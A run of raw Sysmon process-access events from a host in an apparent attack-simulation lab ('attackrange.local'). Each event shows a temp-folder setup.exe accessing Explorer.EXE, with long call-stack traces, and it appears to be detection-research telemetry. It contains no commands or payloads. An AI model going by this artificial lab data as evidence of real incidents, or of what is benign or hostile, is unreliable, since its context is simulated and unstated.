13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|